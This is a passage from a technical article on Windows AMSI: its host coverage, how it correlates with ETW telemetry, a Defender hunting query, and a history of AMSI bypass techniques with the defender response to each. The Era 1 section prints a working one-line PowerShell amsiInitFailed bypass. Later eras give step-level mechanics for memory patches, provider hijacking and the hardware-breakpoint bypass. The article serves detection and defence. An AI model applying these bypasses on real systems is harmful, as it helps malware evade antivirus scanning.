&lt;h3&gt;WMI scripting (Windows 10 1903, May 2019)&lt;/h3&gt;
&lt;p&gt;WMI is, in the abstract, an RPC protocol and a query language, but it is also a code-execution surface (&lt;code&gt;__EventConsumer&lt;/code&gt; persistence; &lt;code&gt;Win32_Process.Create&lt;/code&gt; lateral movement). The 1903 [@wiki-win10-versions] AMSI integration scans WMI scripting paths [@amsi-on-mdav], closing the persistence pivot that had been a favorite of post-exploitation toolkits since 2012.&lt;/p&gt;
&lt;h3&gt;Excel 4.0 macros (March 3, 2021)&lt;/h3&gt;
&lt;p&gt;XLM macros, the language that Microsoft Excel introduced in 1992 (one year before VBA, which arrived in 1993), is the textbook example of a runtime that never died. Attackers rediscovered XLM in 2019 and 2020: Trickbot, Zloader, and Ursnif campaigns all used XLM4 macros to bypass VBA-focused defenses. Microsoft retrofitted the trigger-buffer architecture from VBA to XLM and shipped on March 3, 2021 [@msec-xlm-amsi-2021]. The Microsoft post enumerates the full AMSI host list as of 2021: &quot;Office VBA macros; JScript; VBScript; PowerShell; WMI; Dynamically loaded .NET assemblies; MSHTA/Jscript9.&quot;&lt;/p&gt;
&lt;h3&gt;Windows 11 in-memory script scanning (2021+)&lt;/h3&gt;
&lt;p&gt;AMSI coverage has continued to expand in current Defender releases on Windows 10 and Windows 11 beyond the script-engine hosts above; the precise call-site list is documented per-Defender-release rather than in a single canonical Microsoft Learn page. The current Defender AMSI host list reads: &quot;PowerShell; JScript; VBScript; Windows Script Host (wscript.exe and cscript.exe); .NET Framework 4.8 or newer (scanning of all assemblies); Windows Management Instrumentation (WMI)&quot; [@amsi-on-mdav]. Living-Off-the-Land Binary (LOLBin) paths that bypassed the classic script-engine entry points have become a continuing focus of Defender&apos;s per-release AMSI extensions.&lt;/p&gt;

For detection engineers: the `appName` string you pass to `AmsiInitialize` becomes `DeviceEvents.AmsiProcessName` in the Defender XDR advanced-hunting schema, and the `contentName` you pass to `AmsiScanBuffer` becomes the human-readable label the SOC analyst triages [@deviceevents-table].&lt;p&gt;If you are &lt;em&gt;integrating&lt;/em&gt; a new host, set &lt;code&gt;contentName&lt;/code&gt; to the script-block ID, the assembly&apos;s friendly name, or the URL the macro came from. Never set it to a random GUID, never set it to an empty string. Future-you, hunting at 2 a.m., will thank present-you.&lt;/p&gt;
&lt;p&gt;If you are &lt;em&gt;hunting&lt;/em&gt;, the &lt;code&gt;AmsiProcessName&lt;/code&gt; column tells you which host did the scan, which lets you quickly distinguish a PowerShell payload that landed via &lt;code&gt;winword.exe&lt;/code&gt; (Office VBA -&amp;gt; Shell -&amp;gt; powershell.exe) from one that landed via &lt;code&gt;outlook.exe&lt;/code&gt; (link click -&amp;gt; Edge -&amp;gt; PowerShell). The two have completely different lateral-movement implications.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Seven runtimes, one API. The contract is that each one phones home before it runs your code. The next section is how the seven streams converge into one analyst&apos;s pane of glass.&lt;/p&gt;
&lt;h2&gt;7. AMSI Meets ETW: The Correlation Story&lt;/h2&gt;
&lt;p&gt;The architectural dichotomy fits in one sentence: AMSI is synchronous and can block; &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;Event Tracing for Windows (ETW)&lt;/a&gt; is asynchronous and observation-only. They share the same data, the same provider, and the same calling convention, but they answer different questions. AMSI is for &lt;em&gt;decisions&lt;/em&gt;. ETW is for &lt;em&gt;correlation&lt;/em&gt; and &lt;em&gt;survives in-process bypass&lt;/em&gt;.&lt;/p&gt;

flowchart LR
    A[powershell.exe / winword.exe&lt;br /&gt;scanning host] --&amp;gt; B[amsi.dll AmsiScanBuffer prologue]
    B --&amp;gt; C[ETW provider 2A576B87-09A7-520E-C21A-4942F0271D67 emit event]
    B --&amp;gt; D[MpOav.dll IAntimalwareProvider Scan]
    D --&amp;gt; E[MsMpEng.exe verdict]
    E --&amp;gt; F[result returned synchronously to host]
    F --&amp;gt; G[host refuses or allows execution]
    C --&amp;gt; H[Defender ATP DeviceEvents AmsiScriptDetection]
    C --&amp;gt; I[Third-party EDR via Antimalware-PPL]
    C --&amp;gt; J[Sysmon SilkETW Sealighter on-host]
&lt;p&gt;The ETW provider name is &lt;code&gt;Microsoft-Antimalware-Scan-Interface&lt;/code&gt; and its GUID is &lt;code&gt;{2A576B87-09A7-520E-C21A-4942F0271D67}&lt;/code&gt; [@etw-manifest]. It emits a structured event for every &lt;code&gt;AmsiScanBuffer&lt;/code&gt; call. The event template has ten fields: &lt;code&gt;session&lt;/code&gt;, &lt;code&gt;scanStatus&lt;/code&gt;, &lt;code&gt;scanResult&lt;/code&gt;, &lt;code&gt;appname&lt;/code&gt;, &lt;code&gt;contentname&lt;/code&gt;, &lt;code&gt;contentsize&lt;/code&gt;, &lt;code&gt;originalsize&lt;/code&gt;, &lt;code&gt;content&lt;/code&gt;, &lt;code&gt;hash&lt;/code&gt;, &lt;code&gt;contentFiltered&lt;/code&gt;. The &lt;code&gt;content&lt;/code&gt; field is the deobfuscated buffer that just got scanned. That is the basis of every downstream telemetry product.&lt;/p&gt;

The Event Tracing for Windows provider with GUID `{2A576B87-09A7-520E-C21A-4942F0271D67}` that emits a structured event for every `AmsiScanBuffer` call. The event template carries the deobfuscated content, the AMSI result, the host&apos;s `appName`, and the host&apos;s `contentName`. Consumed by Defender, by third-party EDRs once they have Antimalware-PPL onboarded, and by community tools like SilkETW and Sealighter on individual hosts [@etw-manifest].
&lt;p&gt;Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; consumes the provider; third-party EDRs consume it once they have Antimalware-PPL onboarded; on individual hosts, community tools like SilkETW and Sealighter against the GUID let an analyst capture every scan on an air-gapped machine without a cloud connection.&lt;/p&gt;
&lt;p&gt;In Microsoft Defender for Endpoint, the same event surfaces in the &lt;code&gt;DeviceEvents&lt;/code&gt; table with &lt;code&gt;ActionType == &quot;AmsiScriptDetection&quot;&lt;/code&gt;, and the &lt;code&gt;AmsiData&lt;/code&gt; column carries the deobfuscated content, &lt;code&gt;AmsiPatchedTextInResult&lt;/code&gt; carries any provider-side rewriting, and &lt;code&gt;AmsiProcessName&lt;/code&gt; carries the host&apos;s &lt;code&gt;appName&lt;/code&gt; [@deviceevents-table]. The hunting community has converged on a few canonical patterns. Here is one of them: join the AMSI detection back to its parent process command line to recover the full attack chain.&lt;/p&gt;

DeviceEvents
| where ActionType == &quot;AmsiScriptDetection&quot;
| extend Description = tostring(parse_json(AdditionalFields).Description)
| project Timestamp, DeviceName, DeviceId, InitiatingProcessCommandLine,
          InitiatingProcessParentFileName, Description, ReportId
| join kind=leftouter (
    DeviceProcessEvents
    | project ProcessCommandLine, InitiatingProcessCommandLine,
              InitiatingProcessFolderPath, DeviceId, ReportId
  ) on DeviceId
| where Timestamp &amp;gt; ago(7d)
| sort by Timestamp desc
&lt;p&gt;The query is adapted from Bert-JanP&apos;s &lt;code&gt;AMSIScriptDetections.md&lt;/code&gt; hunting pack [@bertjan-amsi-queries] and maps each detection to MITRE T1059.001 -- Command and Scripting Interpreter: PowerShell [@attack-t1059-001]. The shape of the join is the load-bearing part: AMSI gives you the &lt;em&gt;what&lt;/em&gt; (the deobfuscated buffer), and &lt;code&gt;DeviceProcessEvents&lt;/code&gt; gives you the &lt;em&gt;how&lt;/em&gt; (the parent process and its command line). Together they are the full attack chain.The ETW provider runs from inside &lt;code&gt;AmsiScanBuffer&lt;/code&gt;&apos;s prologue, not at the (possibly bypass-clobbered) return. This is why a Cornelis de Plaa / Outflank 2020 hardware-breakpoint bypass that perfectly hides the scan &lt;em&gt;result&lt;/em&gt; still leaks ETW telemetry: the prologue emit happens before the breakpoint fires. The provider sees the scan happened; only the verdict is muted [@ethicalchaos].&lt;/p&gt;
&lt;p&gt;AMSI hands out the deobfuscated buffer; ETW makes sure someone saw it happen. The attacker&apos;s job for the next seven years was to make neither happen. Here is how that went.&lt;/p&gt;
&lt;h2&gt;8. The Bypass Arms Race: Six Eras in Nearly Seven Years&lt;/h2&gt;
&lt;p&gt;In seven years, attackers have generated six distinct bypass eras. Each era was the &lt;em&gt;necessary consequence&lt;/em&gt; of AMSI&apos;s same-process trust model. Each era&apos;s defeat by Defender required a new architectural insight, not a new signature. Here is the bird&apos;s-eye view.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&quot;right&quot;&gt;Era&lt;/th&gt;
&lt;th&gt;First public&lt;/th&gt;
&lt;th&gt;Attacker / source&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Defender response&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;1&lt;/td&gt;
&lt;td&gt;May 2016&lt;/td&gt;
&lt;td&gt;Matt Graeber (tweet)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;AmsiUtils.amsiInitFailed = true&lt;/code&gt; via reflection&lt;/td&gt;
&lt;td&gt;String signature on field-and-class proximity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;2&lt;/td&gt;
&lt;td&gt;February 2018&lt;/td&gt;
&lt;td&gt;Avi Gimpel and Zeev Ben Porat (CyberArk Labs)&lt;/td&gt;
&lt;td&gt;In-memory patch of &lt;code&gt;AmsiScanString&lt;/code&gt;; May 2018 redux patches &lt;code&gt;AmsiScanBuffer&lt;/code&gt; (&lt;code&gt;xor edi, edi&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Windows 10 1709 swaps to &lt;code&gt;AmsiScanBuffer&lt;/code&gt;; byte-pattern signature on common patches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;3&lt;/td&gt;
&lt;td&gt;2018-2019&lt;/td&gt;
&lt;td&gt;Various practitioners&lt;/td&gt;
&lt;td&gt;Obfuscated patches: hashed &lt;code&gt;GetProcAddress&lt;/code&gt;, indirect writes, randomized bytes&lt;/td&gt;
&lt;td&gt;Behavior signature: detect any write into &lt;code&gt;amsi.dll&lt;/code&gt; code section&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;4&lt;/td&gt;
&lt;td&gt;2019&lt;/td&gt;
&lt;td&gt;Various practitioners&lt;/td&gt;
&lt;td&gt;Register a malicious CLSID under &lt;code&gt;HKLM\...\AMSI\Providers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Windows 10 1709 DLL-hijack mitigation; 1903 Authenticode signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;5&lt;/td&gt;
&lt;td&gt;January 29, 2020&lt;/td&gt;
&lt;td&gt;Cornelis de Plaa (Outflank)&lt;/td&gt;
&lt;td&gt;DR0 hardware breakpoint plus Vectored Exception Handler; no memory patch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Microsoft-Windows-Kernel-Audit-API-Calls&lt;/code&gt; ETW &lt;code&gt;NtSetContextThread&lt;/code&gt; event (admin-side, no PPL gate); &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; on the remote-thread subset&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;6&lt;/td&gt;
&lt;td&gt;December 2022&lt;/td&gt;
&lt;td&gt;Practical Security Analytics&lt;/td&gt;
&lt;td&gt;Patch CLR-side &lt;code&gt;Assembly.Load(byte[])&lt;/code&gt; AMSI callout in &lt;code&gt;clr.dll&lt;/code&gt;; bypass at managed boundary&lt;/td&gt;
&lt;td&gt;Signature on the CLR-side patch; &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt; ETW correlation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Era 1: amsiInitFailed (May 2016)&lt;/h3&gt;
&lt;p&gt;The first public AMSI bypass is one line. Matt Graeber posted it as a tweet in May 2016; Sophos&apos;s June 2021 retrospective preserves the date and the tweet body for readers who cannot reach X: &quot;In May of 2016, PowerShell hacker Matt Graeber published a one-line AMSI evasion in a tweet&quot; [@sophos-bypasses]. MDSec&apos;s June 2018 walk-through reproduces the technique and its decompiled target:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;[Ref].Assembly.GetType(&apos;System.Management.Automation.AmsiUtils&apos;). `
  GetField(&apos;amsiInitFailed&apos;,&apos;NonPublic,Static&apos;). `
  SetValue($null, $true)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does that work? Because the host&apos;s &lt;code&gt;AmsiUtils.ScanContent&lt;/code&gt; checks a private static boolean before doing anything. If the host&apos;s own managed state says &quot;AMSI failed to initialize,&quot; the host short-circuits every subsequent scan to &quot;clean.&quot; MDSec&apos;s analysis quotes the field declaration verbatim: &quot;What we are interested in is the variable &lt;code&gt;amsiInitFailed&lt;/code&gt;, which is defined as: &lt;code&gt;private static bool amsiInitFailed = false&lt;/code&gt;&quot; [@mdsec-evasion].&lt;/p&gt;
&lt;p&gt;The structural lesson is that AMSI&apos;s trust model includes the script engine&apos;s own managed state. PowerShell trusts itself. If you can flip a field in PowerShell&apos;s own memory, you have flipped PowerShell&apos;s trust in AMSI. The short-circuit logic looks like this:&lt;/p&gt;

{`// Decompiled sketch of System.Management.Automation.AmsiUtils.ScanContent.
// Source: Practical Security Analytics decompile of the PowerShell host.&lt;p&gt;function ScanContent(content, scriptName) {
  // amsiSession is AmsiUtils.amsiSession, a static field; not a parameter.
  if (amsiInitFailed) {
    // The bypass: flip this flag once via reflection, every subsequent
    // ScanContent returns AMSI_RESULT_NOT_DETECTED without ever calling
    // amsi.dll. amsiInitFailed is a PRIVATE STATIC field of AmsiUtils;
    // reflection makes it writable from any AppDomain.
    return AMSI_RESULT_NOT_DETECTED;
  }
  if (!amsiInitialized) {
    initialize();  // lazy AmsiInitialize + AmsiOpenSession
  }
  return AmsiNativeMethods.AmsiScanBuffer(
    amsiContext, content, content.length, scriptName, amsiSession);
}`}
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Defender&apos;s response was a string signature on &lt;code&gt;amsiInitFailed&lt;/code&gt; plus class-name proximity. Sophos reports that &quot;the &lt;code&gt;amsiInitFailed&lt;/code&gt; bypass still accounts for about 1 percent of detections, based on a 90-day chunk of telemetry data from February to May of 2021&quot; [@sophos-bypasses]. The bypass is detected almost everywhere it appears, yet it still appears, because some commodity actor still ships the literal string verbatim.&lt;/p&gt;
&lt;h3&gt;Era 2: In-memory &lt;code&gt;AmsiScanString&lt;/code&gt; / &lt;code&gt;AmsiScanBuffer&lt;/code&gt; patch (February 2018)&lt;/h3&gt;
&lt;p&gt;Avi Gimpel and Zeev Ben Porat at CyberArk Labs published the first canonical in-memory native-code patch in February 2018 [@cyberark-patching]. The technique: &lt;code&gt;LoadLibrary(&quot;amsi.dll&quot;)&lt;/code&gt;, &lt;code&gt;GetProcAddress(&quot;AmsiScanString&quot;)&lt;/code&gt;, &lt;code&gt;VirtualProtect&lt;/code&gt; the page to read-write-execute, overwrite the function prologue with &lt;code&gt;mov eax, E_INVALIDARG; ret&lt;/code&gt;, restore the protection. Every subsequent &lt;code&gt;AmsiScanString&lt;/code&gt; returns &lt;code&gt;E_INVALIDARG&lt;/code&gt; without ever talking to the provider.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The first canonical in-memory AMSI patch attack was published by Avi Gimpel and Zeev Ben Porat at CyberArk Labs in February 2018 [@cyberark-patching]. It is sometimes misattributed to Tal Liberman at Black Hat USA 2016; no Liberman BH USA 2016 AMSI talk was independently locatable, and the canonical CyberArk article carries the Gimpel and Ben Porat byline.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s 1709 response was to change which function PowerShell called. Instead of &lt;code&gt;AmsiScanString&lt;/code&gt;, PowerShell 5.0 in 1709 calls &lt;code&gt;AmsiScanBuffer&lt;/code&gt;, breaking the Gimpel and Ben Porat patch outright [@cyberark-redux]. Gimpel and Ben Porat published the redux in May 2018: target the new function with a smaller, semantically equivalent patch, &lt;code&gt;xor edi, edi&lt;/code&gt;. The instruction zeros the buffer-length register, which makes &lt;code&gt;AmsiScanBuffer&lt;/code&gt; think the host handed it an empty buffer and return &lt;code&gt;AMSI_RESULT_CLEAN&lt;/code&gt; [@cyberark-redux].&lt;/p&gt;
&lt;p&gt;The on-record Microsoft response to the CyberArk disclosures is the single most quoted sentence in the AMSI corpus. We hold its full force until §9, but here is the verbatim text Gimpel and Ben Porat reproduced under the heading &quot;Microsoft Security Response Center (MSRC) Response&quot; in their May 2018 redux:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The AMSI was not designed to prevent such attacks. If an attacker can execute code in a process using AMSI to scan for malware, there are numerous ways to alter the behavior of the AMSI scan.&quot; -- Microsoft Security Response Center, quoted in CyberArk Labs (May 2018 redux) [@cyberark-redux].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Era 3: Obfuscated patches (2018-2019)&lt;/h3&gt;
&lt;p&gt;Defender&apos;s first response was a byte-pattern signature on the common patches. Practitioners replied by randomizing the patch bytes, resolving &lt;code&gt;AmsiScanBuffer&lt;/code&gt; by hash rather than by name, writing the patch from indirect memory locations to defeat string-based hunts, and so on. The defender response, in turn, was to stop chasing the byte pattern and start watching for &lt;em&gt;the write itself&lt;/em&gt;: any RWX write into &lt;code&gt;amsi.dll&lt;/code&gt;&apos;s code section, regardless of byte pattern, is suspicious. Trend Micro&apos;s bypass-techniques retrospective lists the era&apos;s techniques side by side: &quot;Obfuscation and/or encryption; PowerShell downgrade; Hooks and unhooks; Memory patching; Forcing an error; Registry modifications; DLL hijacking; Reflection&quot; [@trendmicro-bypass].&lt;/p&gt;
&lt;h3&gt;Era 4: Provider COM-hijack (2019)&lt;/h3&gt;
&lt;p&gt;A different attack class: register a malicious CLSID under &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\Providers&lt;/code&gt;, write your own DLL into the standard COM tree, and &lt;code&gt;amsi.dll&lt;/code&gt; will dutifully load it in-process at &lt;code&gt;AmsiInitialize&lt;/code&gt; time [@redcanary-amsi]. Your provider then returns &lt;code&gt;AMSI_RESULT_CLEAN&lt;/code&gt; for everything, regardless of what the actual antivirus would have said. Admin is required to write the keys, but admin is required for a lot of post-exploitation work, and AMSI is in the trust path for a lot of post-exploitation script.&lt;/p&gt;
&lt;p&gt;The defender response was Windows 10 1709&apos;s DLL-hijack mitigation (provider DLLs that did not load their dependencies with full paths refused to load) and Windows 10 1903&apos;s optional Authenticode signing requirement. With &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\FeatureBits = 0x2&lt;/code&gt;, an unsigned provider refuses to load entirely [@amsi-iantimalware].&lt;/p&gt;
&lt;h3&gt;Era 5: Hardware-breakpoint VEH bypass (January 29, 2020)&lt;/h3&gt;
&lt;p&gt;Cornelis de Plaa, posting as Cneelis at Outflank, published the patchless AMSI bypass on January 29, 2020. The technique elegantly sidesteps every prior defender response by never patching &lt;code&gt;amsi.dll&lt;/code&gt; at all. The Outflank post itself is no longer reachable from non-browser clients (the access caveat and accessible corroborators appear in the Sidenote below); the technique mechanics, attribution, and date are preserved verbatim by EthicalChaos (April 2022) [@ethicalchaos], CrowdStrike (2024) [@crowdstrike-veh], and Trend Micro (December 2022) [@trendmicro-bypass]. Steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;AddVectoredExceptionHandler(1, exceptionHandler)&lt;/code&gt; -- register a vectored exception handler.&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;DR0&lt;/code&gt; to the address of &lt;code&gt;AmsiScanBuffer&lt;/code&gt; via &lt;code&gt;SetThreadContext&lt;/code&gt;. The &lt;code&gt;DR0&lt;/code&gt;-&lt;code&gt;DR3&lt;/code&gt; registers are CPU hardware breakpoints; the processor raises &lt;code&gt;EXCEPTION_SINGLE_STEP&lt;/code&gt; the moment instruction pointer hits the breakpoint address.&lt;/li&gt;
&lt;li&gt;When the breakpoint fires, the exception handler executes. It sets &lt;code&gt;RAX = AMSI_RESULT_CLEAN&lt;/code&gt;, advances &lt;code&gt;RIP&lt;/code&gt; past the function body, and returns &lt;code&gt;EXCEPTION_CONTINUE_EXECUTION&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There is zero static artifact in &lt;code&gt;amsi.dll&lt;/code&gt;. The code section is untouched. Every signature that depends on a write into &lt;code&gt;amsi.dll&lt;/code&gt; is dead. EthicalChaos reproduces the technique mechanics verbatim two years later: &quot;the idea will be to register a vectored exception handler then set a breakpoint on a function within &lt;code&gt;amsi.dll&lt;/code&gt; ... &lt;code&gt;AddVectoredExceptionHandler(1, exceptionHandler) ... SetThreadContext((HANDLE)-2, &amp;amp;threadCtx)&lt;/code&gt;&quot; [@ethicalchaos].The original Outflank 2020-01-29 blog post (outflank.nl, &quot;Bypassing AMSI by manipulating the AMSI scan results&quot;) is no longer reachable from non-browser clients and has no Wayback snapshot; this article therefore cites only accessible corroborators rather than the link-rotten primary. The technique mechanics in this section are reproduced verbatim by EthicalChaos (April 2022) [@ethicalchaos], CrowdStrike (2024) [@crowdstrike-veh], and Trend Micro (December 2022) [@trendmicro-bypass].&lt;/p&gt;
&lt;p&gt;The Defender response is the one this article keeps circling back to: kernel-side ETW. The hardware-breakpoint bypass calls &lt;code&gt;SetThreadContext&lt;/code&gt; to write to &lt;code&gt;DR0&lt;/code&gt;. The &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; (EtwTi) provider&apos;s &lt;code&gt;NtSetContextThread&lt;/code&gt; event covers remote-thread context writes, but in-thread context writes (which is what the patchless bypass performs) are more reliably caught by &lt;code&gt;Microsoft-Windows-Kernel-Audit-API-Calls&lt;/code&gt;, the provider CrowdStrike documents as its primary detection path. CrowdStrike&apos;s writeup gives the framing: &quot;the &lt;code&gt;DR0&lt;/code&gt;-&lt;code&gt;DR3&lt;/code&gt; debug registers contain the addresses of hardware (HW) breakpoints ... patchless AMSI attack called VEH-squared ... mapped in the technique Impair Defenses: Disable or Modify Tools by the MITRE ATT&amp;amp;CK framework (T1562.001)&quot; [@crowdstrike-veh] -- and MITRE&apos;s T1562.001 redirect [@attack-t1562-001] now sends readers to T1685 [@attack-t1685], the unified &quot;Impair Defenses: Disable or Modify Tools&quot; technique. The catch: EtwTi is gated on Antimalware-PPL consumers. Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; and a small set of onboarded third-party EDRs see it. Non-PPL products do not.&lt;/p&gt;

Antimalware Protected Process Light. A Windows signer level (introduced in Windows 8.1, hardened in Windows 10) that lets Defender&apos;s `MsMpEng.exe` and onboarded third-party EDRs consume gated ETW providers like `Microsoft-Windows-Threat-Intelligence` (EtwTi). Without PPL, an EDR cannot see EtwTi events, which means it cannot detect patchless hardware-breakpoint AMSI bypasses through ETW.
&lt;h3&gt;Era 6: CLR-DLL load-time patch (December 2022)&lt;/h3&gt;
&lt;p&gt;If patching &lt;code&gt;amsi.dll&lt;/code&gt; directly is signature-rich, patch something further up the call chain. Practical Security Analytics published the technique in December 2022 [@psa-clr-hooking]: patch the .NET CLR&apos;s own AMSI callout (the managed-side wrapper inside &lt;code&gt;clr.dll&lt;/code&gt; that calls &lt;code&gt;AmsiScanBuffer&lt;/code&gt; on &lt;code&gt;Assembly.Load(byte[])&lt;/code&gt;) rather than &lt;code&gt;amsi.dll&lt;/code&gt; itself. The technique &quot;has an advantage over other API Call Hooking techniques that target native functions such as &lt;code&gt;AMSI.dll::AmsiScanBuffer&lt;/code&gt; in that this method is more difficult to prevent with EDR or Application Protection rules&quot; -- the patched bytes live in &lt;code&gt;clr.dll&lt;/code&gt;, not &lt;code&gt;amsi.dll&lt;/code&gt;, and many defender rules only watch the latter.&lt;/p&gt;
&lt;p&gt;The defender response was twofold: signature on the CLR-side patch bytes, and correlation against the &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt; ETW provider. The DotNETRuntime provider emits an &lt;code&gt;AssemblyLoadFinished&lt;/code&gt; event for every &lt;code&gt;Assembly.Load&lt;/code&gt; call. If the CLR-side AMSI callout has been muted, the load event fires anyway, and Defender now has a &lt;code&gt;DotNETRuntime&lt;/code&gt; event with no corresponding &lt;code&gt;AmsiScanBuffer&lt;/code&gt; event in the prior microseconds. That gap is the signal.&lt;/p&gt;
&lt;h3&gt;Era 7: The behavioral era (2023+)&lt;/h3&gt;
&lt;p&gt;By 2023, the bypass families had grown beyond enumeration. Microsoft&apos;s response was structural: stop trying to enumerate bypass techniques, and start scoring the &lt;em&gt;gap&lt;/em&gt;. Defender&apos;s machine-learning models, described in the August 2020 disclosure on pairs-of-classifiers [@msec-amsi-ml-2020], feed not just on the content of AMSI events but on the &lt;em&gt;cadence&lt;/em&gt; of AMSI events per process. A &lt;code&gt;powershell.exe&lt;/code&gt; that has been alive for 90 seconds, run 14 commands, and emitted zero &lt;code&gt;AmsiScriptDetection&lt;/code&gt; ETW events when the cohort baseline expects six is suspicious regardless of the technical mechanism behind the silence. The structural insight: the win condition is no longer &quot;detect the bypass&quot; but &quot;notice that scanning has stopped.&quot;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; AMSI&apos;s &lt;em&gt;capability&lt;/em&gt; (post-deobfuscation, synchronous, blocking) and its &lt;em&gt;failure mode&lt;/em&gt; (same-process bypass) come from the same architectural fact. Running in the script engine&apos;s process is the only way to see the post-deobfuscation bytes; it is also the only way to be muted by anything else running in that process. Defender&apos;s 2023+ response, scoring the gap rather than the bypass, is the only structurally durable answer because it works against any technique.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The bypass arms race is a symptom, not the disease. The disease is what Microsoft has been saying out loud since 2018: AMSI is not, and was never designed to be, a security boundary.&lt;/p&gt;
&lt;h2&gt;9. What AMSI Is Not: The MSRC Boundary Position&lt;/h2&gt;
&lt;p&gt;When Avi Gimpel and Zeev Ben Porat disclosed their in-memory AMSI patches to the Microsoft Security Response Center across early 2018, the response they received and reproduced verbatim under the &quot;MSRC Response&quot; heading of their May 2018 redux is the most important single sentence in the AMSI corpus:&lt;/p&gt;

The AMSI was not designed to prevent such attacks. If an attacker can execute code in a process using AMSI to scan for malware, there are numerous ways to alter the behavior of the AMSI scan.&lt;p&gt;-- Microsoft Security Response Center, quoted in CyberArk Labs (May 2018 redux)
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;That sentence is not a Microsoft retreat under pressure. It is the published structural position. The Windows Security Servicing Criteria framework, which MSRC uses to triage every bug report against Windows, asks one question to determine whether a finding is serviced as a security vulnerability: &quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature? ... If the answer to either question is no, then by default the vulnerability will be considered for the next version or release of Windows but will not be addressed through a security update or guidance&quot; [@msrc-criteria]. AMSI is published as neither a boundary nor a feature in that taxonomy. Bypasses of AMSI are not security bugs in MSRC&apos;s published framework. They get fixed when Microsoft can fix them. They do not get CVEs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; AMSI is not a security boundary. It is a high-coverage telemetry seam that closes one specific evasion strategy -- pre-execution obfuscation -- and concedes everything else to the layers above and below it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So why is AMSI valuable anyway?&lt;/p&gt;

flowchart TD
    A[AMSI same-process trust model] --&amp;gt; B{Attacker has code execution in the host?}
    B -- No, the attacker is delivering an unprivileged script --&amp;gt; C[AMSI scans the deobfuscated buffer&lt;br /&gt;provider returns DETECTED&lt;br /&gt;host refuses to run]
    B -- Yes, the attacker has unrestricted code execution --&amp;gt; D[AMSI scan is mutable in-process]
    D --&amp;gt; E[ETW provider 2A576B87 emits from inside the prologue]
    E --&amp;gt; F[Defender / EDR sees the scan happened; bypass leaks telemetry]
    D --&amp;gt; G[Defender&apos;s behavioral cohort scoring]
    G --&amp;gt; H[Gap detection: process emitted 0 AmsiData events; cohort expects ~6]
    C --&amp;gt; I[AMSI as synchronous gate: WIN]
    F --&amp;gt; J[AMSI bypass leaves ETW fingerprint: WIN]
    H --&amp;gt; K[Behavioral gap detection: WIN]
&lt;p&gt;There are two trust assumptions, and both hold for most real-world attacks. The first is that the attacker is &lt;em&gt;unprivileged&lt;/em&gt;: they are delivering an obfuscated script payload inside a host process they did not control before delivery. The phishing-document case in §1 is exactly this. AMSI&apos;s synchronous gate beats them. The second is that Defender&apos;s &lt;em&gt;ETW telemetry&lt;/em&gt; of AMSI scans, including the &lt;em&gt;gaps&lt;/em&gt; in those scans, survives the bypass. Even when an in-process bypass mutes the synchronous return, the ETW provider&apos;s prologue emit still fires, and behavioral cohort scoring still notices the missing events. AMSI bypasses leak. Defender&apos;s win condition is that the leak is enough.&lt;/p&gt;
